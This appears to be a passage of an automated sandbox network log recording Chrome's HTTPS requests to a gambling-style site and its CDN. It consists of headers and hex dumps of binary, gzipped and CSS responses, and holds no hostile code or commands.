                                          2025-01-12 00:17:18 UTC16384INData Raw: 00 ff 00 01 ff 00 00 00 01 01 00 00 00 00 00 00 ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 00 ff ff ff 00 00 00 00 00 00 00 00 00 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 ff 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          Data Ascii:
                                          2025-01-12 00:17:18 UTC16384INData Raw: 01 00 00 ff ff 00 01 ff fe 00 01 02 02 00 01 00 ff 00 ff ff 00 00 00 01 ff 00 01 00 00 00 00 00 00 00 00 00 00 00 ff ff 00 00 01 01 ff 00 00 00 01 00 01 01 ff 00 00 00 00 00 ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 00 00 00 00 00 00 00 02 00 00 00 01 ff 00 00 01 00 ff 00 fd 02 02 00 00 00 ff 00 ff 01 01 00 00 00 00 00 ff 01 01 00 ff 00 01 00 02 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 00 00 00 00 00 00 00 01 00 00 00 01 00 01 00 00 00 ff 01 fe 00 00 ff 00 00 00 01 00 00 00 ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          Data Ascii:
                                          2025-01-12 00:17:18 UTC16384INData Raw: 00 ff fe 00 00 00 fe 00 00 00 00 00 00 ff 01 00 00 ff 01 00 00 00 00 00 00 00 00 00 ff 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 00 00 00 00 00 01 01 00 00 00 00 01 00 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 ff 00 00 00 ff 00 00 00 02 00 01 00 00 00 00 00 01 00 00 00 00 00 01 00 00 00 00 00 00 00 ff 00 00 00 00 01 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 00 00 00 00 00 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 00 00 00 00 00 00 ff 00 ff 00 00 ff ff 00 00 01 00 00 00 00 00 00 00 01 01 00 00 00 ff
                                          Data Ascii:
                                          2025-01-12 00:17:18 UTC16384INData Raw: 00 00 00 00 00 00 00 ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 00 02 00 00 00 00 00 00 00 ff ff ff 00 01 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 ff 00 00 00 01 00 00 00 00 00 00 00 fd ff 00 00 01 00 ff 00 ff 00 01 00 01 00 00 00 00 00 01 00 ff 01 00 00 00 00 ff 00 00 00 00 00 00 ff 01 00 00 00 00 00
                                          Data Ascii:
                                          2025-01-12 00:17:18 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 01 01 01 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 00 ff ff ff 00 ff ff ff 00 00 00 00 00 00 00 00 00 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff 00 00 00 01 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 00 00 00 00 00 00 00 ff 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                          Data Ascii:
                                          2025-01-12 00:17:19 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 ff 00 00 00 00 00 01 01 01
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          116192.168.2.449869154.193.113.2334435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:20 UTC697OUTGET / HTTP/1.1
                                          Host: 551000l.cc
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          sec-ch-ua-platform: "Windows"
                                          Upgrade-Insecure-Requests: 1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: navigate
                                          Sec-Fetch-User: ?1
                                          Sec-Fetch-Dest: document
                                          Referer: https://1k4ej4j1lxvjwz.com/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:21 UTC17INHTTP/1.1 200 OK
                                          2025-01-12 00:17:21 UTC44INData Raw: 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 32 35 39 32 30 30 30 0d 0a
                                          Data Ascii: Strict-Transport-Security: max-age=2592000
                                          2025-01-12 00:17:21 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 31 32 20 4a 61 6e 20 32 30 32 35 20 30 30 3a 31 37 3a 32 31 20 47 4d 54 0d 0a
                                          Data Ascii: Date: Sun, 12 Jan 2025 00:17:21 GMT
                                          2025-01-12 00:17:21 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                          Data Ascii: Content-Type: text/html; charset=utf-8
                                          2025-01-12 00:17:21 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                          Data Ascii: Vary: Accept-Encoding
                                          2025-01-12 00:17:21 UTC24INData Raw: 58 2d 68 74 6d 6c 2d 63 61 63 68 65 3a 20 48 49 54 2d 33 36 30 30 0d 0a
                                          Data Ascii: X-html-cache: HIT-3600
                                          2025-01-12 00:17:21 UTC29INData Raw: 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a
                                          Data Ascii: X-Frame-Options: SAMEORIGIN
                                          2025-01-12 00:17:21 UTC9INData Raw: 75 75 69 64 3a 20 2d 0d 0a
                                          Data Ascii: uuid: -
                                          2025-01-12 00:17:21 UTC25INData Raw: 6f 75 74 2d 6c 69 6e 65 3a 20 67 62 2d 73 6f 75 72 63 65 2d 31 33 37 0d 0a
                                          Data Ascii: out-line: gb-source-137
                                          2025-01-12 00:17:21 UTC36INData Raw: 58 2d 43 61 63 68 65 3a 20 4d 49 53 53 20 66 72 6f 6d 20 63 64 6e 2d 53 74 61 72 6c 69 6e 6b 2d 4b 52 0d 0a
                                          Data Ascii: X-Cache: MISS from cdn-Starlink-KR
                                          2025-01-12 00:17:21 UTC28INData Raw: 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a
                                          Data Ascii: Transfer-Encoding: chunked


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          117192.168.2.449868154.193.113.2334435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:22 UTC537OUTGET /message_zh_CN.js?v=1736150851437 HTTP/1.1
                                          Host: 551000l.cc
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: */*
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: script
                                          Referer: https://551000l.cc/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:22 UTC17INHTTP/1.1 200 OK
                                          2025-01-12 00:17:22 UTC44INData Raw: 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 32 35 39 32 30 30 30 0d 0a
                                          Data Ascii: Strict-Transport-Security: max-age=2592000
                                          2025-01-12 00:17:22 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 31 32 20 4a 61 6e 20 32 30 32 35 20 30 30 3a 31 37 3a 32 32 20 47 4d 54 0d 0a
                                          Data Ascii: Date: Sun, 12 Jan 2025 00:17:22 GMT
                                          2025-01-12 00:17:22 UTC52INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                          Data Ascii: Content-Type: application/javascript;charset=UTF-8
                                          2025-01-12 00:17:22 UTC23INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a
                                          Data Ascii: Vary: Accept-Encoding
                                          2025-01-12 00:17:22 UTC24INData Raw: 43 6f 6e 74 65 6e 74 2d 45 6e 63 6f 64 69 6e 67 3a 20 67 7a 69 70 0d 0a
                                          Data Ascii: Content-Encoding: gzip
                                          2025-01-12 00:17:22 UTC32INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a
                                          Data Ascii: Access-Control-Allow-Origin: *
                                          2025-01-12 00:17:22 UTC29INData Raw: 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a
                                          Data Ascii: X-Frame-Options: SAMEORIGIN
                                          2025-01-12 00:17:22 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 4d 6f 6e 2c 20 31 33 20 4a 61 6e 20 32 30 32 35 20 30 30 3a 31 37 3a 32 32 20 47 4d 54 0d 0a
                                          Data Ascii: Expires: Mon, 13 Jan 2025 00:17:22 GMT
                                          2025-01-12 00:17:22 UTC30INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 38 36 34 30 30 0d 0a
                                          Data Ascii: Cache-Control: max-age=86400
                                          2025-01-12 00:17:22 UTC14INData Raw: 58 2d 43 61 63 68 65 3a 20 48 49 54 0d 0a
                                          Data Ascii: X-Cache: HIT


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          118192.168.2.449871103.198.200.74435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:23 UTC562OUTGET /ftl/commonPage/themes/gui-base.css HTTP/1.1
                                          Host: p3yw7u.innittapp.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: text/css,*/*;q=0.1
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: style
                                          Referer: https://551000l.cc/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:23 UTC690INHTTP/1.1 200 OK
                                          Content-Type: text/css
                                          Content-Length: 17137
                                          Connection: close
                                          Server: Default-server-KS-CLOUD-XG-FOREIGN-12-03
                                          ETag: W/"66bc0c2d-145e6"
                                          Date: Fri, 03 Jan 2025 02:24:24 GMT
                                          Last-Modified: Wed, 14 Aug 2024 01:45:17 GMT
                                          Expires: Sun, 02 Feb 2025 02:24:24 GMT
                                          Age: 769979
                                          Cache-Control: max-age=86400
                                          Accept-Ranges: bytes
                                          Vary: Accept-Encoding
                                          Content-Encoding: gzip
                                          Access-Control-Allow-Origin: *
                                          X-Frame-Options: SAMEORIGIN
                                          X-Cache: HIT
                                          uuid: -
                                          out-line: gb-cdn-211
                                          x-link-via: xg21:443;xg12:80;
                                          X-Cache-Status: MISS from KS-CLOUD-XG-FOREIGN-12-03
                                          X-Cache-Status: HIT from KS-CLOUD-XG-FOREIGN-21-07
                                          X-Cdn-Request-ID: 4aaffff8d3d7ff98df1e1e7bdb291e2e
                                          2025-01-12 00:17:23 UTC15694INData Raw: 1f 8b 08 00 00 00 00 00 00 03 cd 7d 79 93 e4 c6 75 e7 ff fa 14 50 33 18 9c 21 ab 8a 00 ea ee 0a 4e 88 94 ad 23 2c d9 5e 51 d6 1e 14 83 81 02 b2 aa c0 41 01 25 00 d5 07 3b ca a1 f0 5a 22 ad b5 0e cb b2 b4 3a bc a2 7c 2d ad 90 e4 db 26 45 4a fe 32 ec 99 e1 5f fe 0a ce 1b 79 bc 44 a1 7b 64 ef 76 93 d3 55 99 bf 7c f9 f2 bd 97 2f ef cc 67 9f fe f0 87 bc a7 bd 8f 47 5b f4 42 71 f1 3b 9f ec bf 10 55 c8 bb 73 fd c3 9f 3f fc d1 17 3f f8 9f 6f 5d bf f1 e5 bb 04 70 86 ca 2a 2d 72 2f 18 f8 83 39 09 78 7e 5f 6f 8a f2 d4 7b b1 46 67 28 27 21 bf 16 d5 c8 db 16 49 ba 4a 51 e2 85 7e 30 ed fb f3 be 1f e2 b8 67 3f f4 ec d3 de c3 9f ff d9 f5 1f 7e e9 c1 9b ff 72 fd de d7 49 d0 47 d2 ed ae 28 6b 6f 5f 66 77 4e 36 45 be 5e 46 c5 20 ae aa 93 bb 0b 02 bf fe d2 5b d7 7f f7 c5 eb
                                          Data Ascii: }yuP3!N#,^QA%;Z":|-&EJ2_yD{dvU|/gG[Bq;Us??o]p*-r/9x~_o{Fg('!IJQ~0g?~rIG(ko_fwN6E^F [
                                          2025-01-12 00:17:23 UTC1443INData Raw: 75 f3 26 d2 63 75 13 12 2b af a6 06 8f b8 fd df a7 7d fc 2f ee d6 28 9a ef 2b ab e2 9e 0a 12 ad 88 d7 b9 74 10 fb 78 08 fe 9f c9 87 6e 15 64 fc ff 1f 9d e3 6d f5 6a 08 e6 3f 4b a9 d8 81 fa d6 e0 05 bb 5d e6 75 57 78 e0 bb 79 f0 f5 6f be ff ee 3f 3f f8 fa 37 3e f8 f2 37 ff ed bd ef 11 b7 cb fa 24 fd 3a dd e9 be d6 f7 e7 2b b4 92 1e 7f 48 6e ac 50 fa 41 0b 55 11 ea d0 93 21 d5 de 05 3f 98 ad dd 89 42 5b 05 45 5e a4 c0 0d 27 83 28 c3 7e 4d ba 2a df d3 a3 95 0b 46 9a ab 45 3c be b5 47 87 7a 3b 68 2c 00 0f 6f f4 84 03 fc 8f b4 96 db 12 89 14 7b 55 07 37 6a a7 85 ca ab 25 6f fa 85 ec fc 82 da 19 ae 91 c9 58 1d 93 8d e8 37 6a 6f 64 12 53 f4 b3 fb 2c 5c cc 4c 10 35 fa 52 8d e4 b3 35 f0 75 b0 24 8e 8f 48 c6 ec 51 b0 9a 92 ed e2 b1 6d 84 1a e7 fb bf f8 e3 47 bf f7
                                          Data Ascii: u&cu+}/(+txndmj?K]uWxyo??7>7$:+HnPAU!?B[E^'(~M*FE<Gz;h,o{U7j%oX7jodS,\L5R5u$HQmG


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          119192.168.2.449875103.198.200.74435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:23 UTC570OUTGET /ftl/commonPage/themes/gui-skin-default.css HTTP/1.1
                                          Host: p3yw7u.innittapp.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: text/css,*/*;q=0.1
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: style
                                          Referer: https://551000l.cc/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:23 UTC688INHTTP/1.1 200 OK
                                          Content-Type: text/css
                                          Content-Length: 6253
                                          Connection: close
                                          Server: Default-server-KS-CLOUD-XG-FOREIGN-12-01
                                          ETag: W/"64ad1569-7b6e"
                                          Date: Tue, 07 Jan 2025 09:17:58 GMT
                                          Last-Modified: Tue, 11 Jul 2023 08:40:09 GMT
                                          Expires: Thu, 06 Feb 2025 09:17:58 GMT
                                          Age: 399565
                                          Cache-Control: max-age=86400
                                          Accept-Ranges: bytes
                                          Vary: Accept-Encoding
                                          Content-Encoding: gzip
                                          Access-Control-Allow-Origin: *
                                          X-Frame-Options: SAMEORIGIN
                                          X-Cache: HIT
                                          uuid: -
                                          out-line: gb-cdn-212
                                          x-link-via: xg21:443;xg12:80;
                                          X-Cache-Status: MISS from KS-CLOUD-XG-FOREIGN-12-01
                                          X-Cache-Status: HIT from KS-CLOUD-XG-FOREIGN-21-12
                                          X-Cdn-Request-ID: 79d2b4f6539617429313628e6f52b192
                                          2025-01-12 00:17:23 UTC6253INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 3d 6b 8f 1c c7 71 df f5 2b c6 14 08 de f1 6e 96 b3 cf bb dd 05 0f 3e 92 47 8a 72 68 4b 7c 58 24 65 7d 98 9d e9 dd 1d 71 76 66 31 33 cb bb e3 e2 00 05 49 04 2b 8e f3 70 92 0f 81 23 20 8c 11 c3 5f ec 0f 09 02 24 91 6d fd 97 c0 a4 c4 4f fe 0b e9 e7 4c 3f 6a 1e 7b 52 00 11 d0 1d a5 9b ed ae ae ae aa ae ae ae ae ae e9 fd e3 67 9f 5f b9 fc 9d 37 ac cb d6 2d 77 81 ae c5 27 0f 6e db f7 9e 04 91 7d 03 4d dd 55 98 59 5b af 7e f1 d7 2f ff e5 b7 af fe ec 57 2f 7e fc f1 1f 7f fb c9 ff 7e f4 0f f8 df 17 ff f4 bb 2f 3f f9 f7 2f fe e3 33 56 4b da 3f 45 49 1a c4 91 d5 6e 39 ad 21 29 38 5c 65 f3 38 19 59 f7 32 f4 14 45 a4 e4 86 9b 21 6b 11 fb c1 34 40 be d5 71 da 7b b6 33 b4 3b 6d 5c 77 85 50 71 35 ff b1 fc 24 5e fa f1 71 94 5a 7f f8 af 9f
                                          Data Ascii: =kq+n>GrhK|X$e}qvf13I+p# _$mOL?j{Rg_7-w'n}MUY[~/W/~~/?/3VK?EIn9!)8\e8Y2E!k4@q{3;m\wPq5$^qZ


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          120192.168.2.449870103.198.200.74435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:23 UTC567OUTGET /ftl/bet365-1761/themes/style/common.css HTTP/1.1
                                          Host: p3yw7u.innittapp.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: text/css,*/*;q=0.1
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: style
                                          Referer: https://551000l.cc/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:23 UTC687INHTTP/1.1 200 OK
                                          Content-Type: text/css
                                          Content-Length: 19716
                                          Connection: close
                                          Server: Default-server-KS-CLOUD-XG-FOREIGN-12-03
                                          ETag: "652f38c4-4d04"
                                          Date: Fri, 03 Jan 2025 16:37:26 GMT
                                          Last-Modified: Wed, 18 Oct 2023 01:45:40 GMT
                                          Expires: Sun, 02 Feb 2025 16:37:26 GMT
                                          Age: 718796
                                          Cache-Control: max-age=86400
                                          Accept-Ranges: bytes
                                          Vary: Accept-Encoding
                                          Vary: Accept-Encoding
                                          Access-Control-Allow-Origin: *
                                          X-Frame-Options: SAMEORIGIN
                                          X-Cache: MISS
                                          uuid: -
                                          out-line: gb-cdn-213
                                          x-link-via: xg21:443;xg12:80;
                                          X-Cache-Status: MISS from KS-CLOUD-XG-FOREIGN-12-03
                                          X-Cache-Status: HIT from KS-CLOUD-XG-FOREIGN-21-13
                                          X-Cdn-Request-ID: e49aaafd6d8b51320f29996b52bbc2fc
                                          2025-01-12 00:17:23 UTC15697INData Raw: ef bb bf ef bb bf 2f 2a 20 e7 a6 81 e7 94 a8 e5 93 8d e5 ba 94 20 2a 2f 0a 0a 0a 0a 61 2c 20 61 3a 68 6f 76 65 72 20 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 7d 0a 0a 2f 2a 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 20 63 6f 6d 6d 6f 6e 20 e5 85 ac e5 85 b1 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 2a 2f 0a 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 27 2c 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 63 65 6e 74 65 72 3b 20 7d 0a 75 6c 2c 6f
                                          Data Ascii: /* */a, a:hover {text-decoration: none;}/*==================== common ====================*/body{font-family: 'Microsoft YaHei',"Helvetica Neue",Helvetica,Arial,sans-serif;font-size:14px;background-position: center; }ul,o
                                          2025-01-12 00:17:23 UTC4019INData Raw: 6d 61 69 6e 2d 73 70 6f 72 74 73 20 2e 61 70 69 2d 74 61 62 73 20 6c 69 2e 61 63 74 69 76 65 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 7d 0a 2e 6d 61 69 6e 2d 73 70 6f 72 74 73 20 2e 61 70 69 2d 74 61 62 73 20 6c 69 2e 61 63 74 69 76 65 20 61 7b 63 6f 6c 6f 72 3a 23 31 34 38 30 35 64 3b 7d 0a 2e 6d 61 69 6e 2d 73 70 6f 72 74 73 20 2e 61 70 69 2d 74 61 62 73 20 6c 69 3a 66 69 72 73 74 2d 63 68 69 6c 64 2e 61 63 74 69 76 65 7b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 31 70 78 20 73 6f 6c 69 64 20 23 31 34 38 30 35 64 3b 7d 0a 2e 6d 61 69 6e 2d 73 70 6f 72 74 73 20 2e 61 70 69 2d 74 61 62 73 20 6c 69 7b 6d 61 72 67 69 6e 3a 30 3b 74 65 78 74 2d 73 68 61 64 6f 77 3a
                                          Data Ascii: main-sports .api-tabs li.active{border-top:0;border-bottom:0;background: #fff;}.main-sports .api-tabs li.active a{color:#14805d;}.main-sports .api-tabs li:first-child.active{border-left:1px solid #14805d;}.main-sports .api-tabs li{margin:0;text-shadow:


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          121192.168.2.449874103.198.200.74435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:23 UTC581OUTGET /ftl/bet365-1761/themes/style/bootstrap-dialog.min.css HTTP/1.1
                                          Host: p3yw7u.innittapp.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: text/css,*/*;q=0.1
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: style
                                          Referer: https://551000l.cc/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:23 UTC685INHTTP/1.1 200 OK
                                          Content-Type: text/css
                                          Content-Length: 2780
                                          Connection: close
                                          Server: Default-server-KS-CLOUD-XG-FOREIGN-12-01
                                          ETag: "651e5941-adc"
                                          Date: Thu, 09 Jan 2025 22:42:34 GMT
                                          Last-Modified: Thu, 05 Oct 2023 06:35:45 GMT
                                          Expires: Sat, 08 Feb 2025 22:42:34 GMT
                                          Age: 178488
                                          Cache-Control: max-age=86400
                                          Accept-Ranges: bytes
                                          Vary: Accept-Encoding
                                          Vary: Accept-Encoding
                                          Access-Control-Allow-Origin: *
                                          X-Frame-Options: SAMEORIGIN
                                          X-Cache: MISS
                                          uuid: -
                                          out-line: gb-cdn-213
                                          x-link-via: xg21:443;xg12:80;
                                          X-Cache-Status: MISS from KS-CLOUD-XG-FOREIGN-12-01
                                          X-Cache-Status: HIT from KS-CLOUD-XG-FOREIGN-21-08
                                          X-Cdn-Request-ID: d8d28a266ea3fc371b33bcc9baf44b29
